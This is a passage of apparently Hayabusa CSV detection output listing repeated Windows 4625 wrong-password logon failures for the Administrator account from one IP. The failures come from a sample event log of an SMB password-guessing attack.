NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: 
